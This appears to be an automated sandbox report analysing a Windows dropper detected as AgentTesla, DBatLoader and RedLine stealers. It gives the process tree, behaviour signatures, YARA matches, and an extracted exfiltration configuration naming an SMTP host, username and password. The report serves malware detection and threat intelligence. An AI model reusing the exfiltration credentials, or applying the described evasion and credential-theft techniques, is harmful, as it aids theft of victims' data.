Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Analysis ID:	1380665
MD5:	39ad433c9ba920e7fd0961c66ac7079e
SHA1:	8a54961347eab2253e2004e33f399c4cd07c8577
SHA256:	e1471b0576c26d33b4fda732a7e0aba43193849ef1de6bbcdd42e8724354dd00
Tags:	exe
Infos:

Detection

AgentTesla, DBatLoader, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected DBatLoader

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

Allocates memory in foreign processes

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates driver files

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe (PID: 7048 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe MD5: 39AD433C9BA920E7FD0961C66AC7079E)

cmd.exe (PID: 6376 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7160 cmdline: cmd /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

srcngmlC.pif (PID: 5660 cmdline: C:\Users\Public\Libraries\srcngmlC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Clmgncrs.PIF (PID: 6472 cmdline: "C:\Users\Public\Libraries\Clmgncrs.PIF" MD5: 39AD433C9BA920E7FD0961C66AC7079E)

srcngmlC.pif (PID: 6348 cmdline: C:\Users\Public\Libraries\srcngmlC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Clmgncrs.PIF (PID: 1028 cmdline: "C:\Users\Public\Libraries\Clmgncrs.PIF" MD5: 39AD433C9BA920E7FD0961C66AC7079E)

srcngmlC.pif (PID: 6164 cmdline: C:\Users\Public\Libraries\srcngmlC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.oripam.xyz", "Username": "101@oripam.xyz", "Password": "231Father@"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000005.00000002.1851440244.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.1851440244.0000000000450000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2903058685.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000001.1903364195.00000000004A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000001.1683699497.00000000004A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.2903058685.0000000000450000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.1918672427.0000000000450000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x428b5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x42927:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x429b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x42a43:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x42aad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x42b1f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x42bb5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x42c45:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x419cd:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x41a3f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x41ac9:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x41b5b:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x41bc5:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x41c37:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x41ccd:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x41d5d:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000C.00000001.1903364195.0000000000450000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000001.1833365375.0000000000450000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.1918672427.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.1683696452.000000007EA40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000001.1683699497.0000000000450000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000001.1833365375.00000000004A0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: srcngmlC.pif PID: 5660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: srcngmlC.pif PID: 5660	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: srcngmlC.pif PID: 6348	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: srcngmlC.pif PID: 6348	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: srcngmlC.pif PID: 6164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: srcngmlC.pif PID: 6164	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 69 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.srcngmlC.pif.400000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
8.2.srcngmlC.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A5 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
12.2.srcngmlC.pif.3eeb5b90.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.srcngmlC.pif.3eeb5b90.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
